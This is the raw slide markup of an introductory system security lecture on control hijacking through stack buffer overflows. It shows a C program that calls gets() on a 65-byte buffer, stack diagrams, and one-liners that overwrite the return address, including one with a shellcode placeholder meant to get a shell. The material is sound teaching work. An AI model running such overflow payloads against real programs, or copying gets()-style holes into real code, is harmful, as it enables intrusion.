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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Sniglet"/>
      <p:regular r:id="rId21"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Walter Turncoat"/>
      <p:regular r:id="rId22"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bree Serif"/>
      <p:regular r:id="rId23"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Droid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WalterTurncoat-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Sniglet-regular.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DroidSans-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/BreeSerif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Droid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12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143212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212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1143212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12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12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619122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41931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700925" y="1866400"/>
            <a:ext cx="5742300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3593400" y="11434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734200"/>
            <a:ext cx="887711" cy="1132265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-6025" y="1290633"/>
            <a:ext cx="9156000" cy="1143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2084533"/>
            <a:ext cx="8229600" cy="333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-6025" y="1290633"/>
            <a:ext cx="9156000" cy="1143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2010566"/>
            <a:ext cx="3994500" cy="4557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5" y="2010566"/>
            <a:ext cx="3994500" cy="4557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6025" y="1290633"/>
            <a:ext cx="9156000" cy="1143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2010566"/>
            <a:ext cx="2631900" cy="4557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223963" y="2010566"/>
            <a:ext cx="2631900" cy="4557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990727" y="2010566"/>
            <a:ext cx="2631900" cy="4557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6025" y="1290633"/>
            <a:ext cx="9156000" cy="1143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1290633"/>
            <a:ext cx="91560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2084533"/>
            <a:ext cx="8229600" cy="333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inyurl.com/system-security-summerschoo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248424"/>
            <a:ext cx="7772400" cy="3344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Introduction To </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5500"/>
              <a:t>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5500"/>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5500"/>
              <a:t>  Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716898" y="3032150"/>
            <a:ext cx="2266626" cy="137303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4345025" y="2032450"/>
            <a:ext cx="3444586" cy="1354571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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261150" y="3529075"/>
            <a:ext cx="63429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Exploitation : Control Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10655244">
            <a:off x="5600599" y="4367805"/>
            <a:ext cx="2260965" cy="192841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5817225" y="4897250"/>
            <a:ext cx="2220900" cy="17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Gaurav Kumar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Nishit Majithia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Rohit Sehgal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1421775" y="2226100"/>
            <a:ext cx="5502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487950" y="1552575"/>
            <a:ext cx="3876900" cy="5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int main(int count,char **argv)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int variable = 10;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char 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buffer</a:t>
            </a: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[65];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gets(buffer);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if(variable != 10)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	printf(“My Variable is 10”);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else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	printf(“OOps I dont see 10”);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return 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}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5926425" y="1250950"/>
            <a:ext cx="2333400" cy="4551300"/>
            <a:chOff x="5926425" y="1250950"/>
            <a:chExt cx="2333400" cy="4551300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="200" name="Shape 200"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926425" y="1250950"/>
              <a:ext cx="2333400" cy="455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5926450" y="1268675"/>
              <a:ext cx="2324400" cy="585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930925" y="1854275"/>
              <a:ext cx="2324400" cy="585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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="203" name="Shape 203"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="201" idx="0"/>
              <a:endCxn id="202" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088650" y="1268675"/>
              <a:ext cx="4500" cy="58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04" name="Shape 204"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6112750" y="1414250"/>
              <a:ext cx="18543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count	            **argv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5930925" y="2439875"/>
              <a:ext cx="2324400" cy="585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Previous SP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5926450" y="3025475"/>
              <a:ext cx="2324400" cy="354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variable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5930925" y="3380075"/>
              <a:ext cx="2324400" cy="1703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65 bytes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buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="208" name="Shape 208"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6210350" y="3451225"/>
              <a:ext cx="0" cy="153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209" name="Shape 209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1785650" y="307775"/>
            <a:ext cx="7898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 Exa</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000"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[si]</a:t>
            </a:r>
            <a:r>
              <a:rPr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mple .. IV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87950" y="5961975"/>
            <a:ext cx="7968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A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>echo -e `python -c “print ‘A’*65 + ‘B’*4 + ‘C’*4 + ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x12\x34\x56\x78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4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 ” ` |  ./a.out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-1082375" y="17750"/>
            <a:ext cx="51102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7709625" y="487067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13" name="Shape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="464897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14" name="Shape 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="442727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15" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="383216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16" name="Shape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="361046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17" name="Shape 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="338876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218" name="Shape 218"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="214" idx="0"/>
            <a:endCxn id="215" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7984725" y="4053775"/>
            <a:ext cx="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9" name="Shape 219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523450" y="79850"/>
            <a:ext cx="51102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5961925" y="3069678"/>
            <a:ext cx="6387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221" name="Shape 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600625" y="3069678"/>
            <a:ext cx="6387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222" name="Shape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239325" y="3070105"/>
            <a:ext cx="9672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    B     B </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Shape 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="2536900"/>
            <a:ext cx="2108400" cy="373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C	 C	 C	 C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774900" y="2611250"/>
            <a:ext cx="1551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5" name="Shape 225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326800" y="2420075"/>
            <a:ext cx="19251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Address using GDB - \x12\x34\x56\x78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744150" y="4870675"/>
            <a:ext cx="1368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0x12345678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="1969475"/>
            <a:ext cx="2108400" cy="373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0x 12 34 56 78 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="227" idx="1"/>
            <a:endCxn id="226" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="2156225"/>
            <a:ext cx="62100" cy="2901300"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd fmla="val -944525" name="adj1"/>
              <a:gd fmla="val 20487" name="adj2"/>
              <a:gd fmla="val -1632890" name="adj3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29" name="Shape 229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147200" y="5057525"/>
            <a:ext cx="1862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Segmentation Fault!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="230" name="Shape 230"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="207" idx="2"/>
            <a:endCxn id="229" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="5072625" y="3063275"/>
            <a:ext cx="26400" cy="4014600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd fmla="val 1938542" name="adj1"/>
              <a:gd fmla="val 63493" name="adj2"/>
              <a:gd fmla="val 1621780" name="adj3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-6000" y="413133"/>
            <a:ext cx="9156000" cy="11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Only Variable Updation ….  ??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754148" y="3186687"/>
            <a:ext cx="1978323" cy="558883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922725" y="3275412"/>
            <a:ext cx="16146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Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6524498" y="3091812"/>
            <a:ext cx="1701556" cy="674375"/>
            <a:chOff x="6196223" y="2512325"/>
            <a:chExt cx="1701556" cy="674375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="239" name="Shape 239"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6196223" y="2512325"/>
              <a:ext cx="1575618" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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6283179" y="2590600"/>
              <a:ext cx="16146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Getting Shell</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3582835" y="3086587"/>
            <a:ext cx="1978323" cy="684825"/>
            <a:chOff x="3664098" y="3087425"/>
            <a:chExt cx="1978323" cy="684825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Shape 242"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3664098" y="3087425"/>
              <a:ext cx="1978323" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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3832675" y="3176150"/>
              <a:ext cx="16146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Executable STK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874500" y="3397950"/>
            <a:ext cx="612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5" name="Shape 245"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736675" y="3328550"/>
            <a:ext cx="612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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741550" y="306674"/>
            <a:ext cx="7772400" cy="88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Executable Stack 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1152300" y="1895700"/>
            <a:ext cx="7361700" cy="43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Char char="●"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The content on the stack is treated as instruction.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Char char="●"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They can be executed.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Char char="●"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If i add Machine Language instruction in stack, then it will be executed as instruction. That particular instruction will add something.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Char char="●"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What if I add executable code of getting shell prompt. </a:t>
            </a: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Char char="●"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What will happen when it will be executed ??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-6000" y="413133"/>
            <a:ext cx="9156000" cy="11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Only Variable Updation ….  ??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754148" y="3186687"/>
            <a:ext cx="1978323" cy="558883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922725" y="3275412"/>
            <a:ext cx="16146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Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="259" name="Shape 259"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6524498" y="3091812"/>
            <a:ext cx="1701556" cy="674375"/>
            <a:chOff x="6196223" y="2512325"/>
            <a:chExt cx="1701556" cy="674375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260" name="Shape 260"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6196223" y="2512325"/>
              <a:ext cx="1575618" cy="558883"/>
            </a:xfrm>
            <a:custGeom>
              <a:pathLst>
                <a:path extrusionOk="0" h="62358" w="65189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6283179" y="2590600"/>
              <a:ext cx="16146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Getting Shell</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3582835" y="3086587"/>
            <a:ext cx="1978323" cy="558883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3751412" y="3175312"/>
            <a:ext cx="16146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Executable STK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874500" y="3397950"/>
            <a:ext cx="612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5" name="Shape 265"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736675" y="3328550"/>
            <a:ext cx="612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1421775" y="2226100"/>
            <a:ext cx="5502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487950" y="1552575"/>
            <a:ext cx="3876900" cy="5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int main(int count,char **argv)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int variable = 10;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char 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buffer</a:t>
            </a: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[65];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gets(buffer);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if(variable != 10)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	printf(“My Variable is 10”);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else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	printf(“OOps I dont see 10”);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return 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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="272" name="Shape 272"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5926425" y="1250950"/>
            <a:ext cx="2333400" cy="4551300"/>
            <a:chOff x="5926425" y="1250950"/>
            <a:chExt cx="2333400" cy="4551300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="273" name="Shape 273"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926425" y="1250950"/>
              <a:ext cx="2333400" cy="455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926450" y="1268675"/>
              <a:ext cx="2324400" cy="585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5930925" y="1854275"/>
              <a:ext cx="2324400" cy="585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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="276" name="Shape 276"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="274" idx="0"/>
              <a:endCxn id="275" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088650" y="1268675"/>
              <a:ext cx="4500" cy="58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77" name="Shape 277"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6112750" y="1414250"/>
              <a:ext cx="18543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count	            **argv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5930925" y="2439875"/>
              <a:ext cx="2324400" cy="585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Previous SP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Shape 279"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5926450" y="3025475"/>
              <a:ext cx="2324400" cy="354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variable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5930925" y="3380075"/>
              <a:ext cx="2324400" cy="1703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65 bytes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buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="281" name="Shape 281"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6210350" y="3451225"/>
              <a:ext cx="0" cy="153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282" name="Shape 282"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1785650" y="307775"/>
            <a:ext cx="7898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 Exa</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000"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[si]</a:t>
            </a:r>
            <a:r>
              <a:rPr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mple .. V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87950" y="5961975"/>
            <a:ext cx="7968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A4C2F4"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>echo -e `python -c “print ‘&lt;SHELLCODE&gt;’*(65-len(&lt;SHELLCODE&gt;) + ‘B’*4 + ‘C’*4 + ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x12\x34\x56\x78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4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 ” ` |  ./a.out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-1082375" y="17750"/>
            <a:ext cx="51102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7709625" y="487067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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="464897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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="442727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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="383216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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="361046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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7709625" y="338876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XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Shape 291"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="287" idx="0"/>
            <a:endCxn id="288" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7984725" y="4053775"/>
            <a:ext cx="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2" name="Shape 292"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523450" y="79850"/>
            <a:ext cx="51102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961925" y="3069678"/>
            <a:ext cx="6387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294" name="Shape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600625" y="3069678"/>
            <a:ext cx="6387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295" name="Shape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239325" y="3070105"/>
            <a:ext cx="9672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    B     B </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="2536900"/>
            <a:ext cx="2108400" cy="373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C	 C	 C	 C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774900" y="2611250"/>
            <a:ext cx="1551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8" name="Shape 298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326800" y="2420075"/>
            <a:ext cx="19251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Address using GDB - \x12\x34\x56\x78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4744150" y="4870675"/>
            <a:ext cx="1368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0x12345678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="1969475"/>
            <a:ext cx="2108400" cy="373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0x 12 34 56 78 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="300" idx="1"/>
            <a:endCxn id="299" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6050650" y="2156225"/>
            <a:ext cx="62100" cy="2901300"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd fmla="val -944525" name="adj1"/>
              <a:gd fmla="val 20487" name="adj2"/>
              <a:gd fmla="val -1632890" name="adj3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02" name="Shape 302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147200" y="5057525"/>
            <a:ext cx="1862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$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="280" idx="2"/>
            <a:endCxn id="302" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="5072625" y="3063275"/>
            <a:ext cx="26400" cy="4014600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd fmla="val 1938542" name="adj1"/>
              <a:gd fmla="val 63493" name="adj2"/>
              <a:gd fmla="val 1621780" name="adj3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04" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072275" y="5120275"/>
            <a:ext cx="1719000" cy="53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-6000" y="413133"/>
            <a:ext cx="9156000" cy="11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Only Variable Updation ….  ??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754148" y="3186687"/>
            <a:ext cx="1978323" cy="558883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922725" y="3275412"/>
            <a:ext cx="16146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Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524498" y="3091812"/>
            <a:ext cx="1575618" cy="558883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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611454" y="3170087"/>
            <a:ext cx="16146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Getting Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3582835" y="3086587"/>
            <a:ext cx="1978323" cy="558883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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3751412" y="3175312"/>
            <a:ext cx="16146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Executable STK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874500" y="3397950"/>
            <a:ext cx="612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7" name="Shape 317"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736675" y="3328550"/>
            <a:ext cx="612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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822500" y="1603133"/>
            <a:ext cx="54570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thanks!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
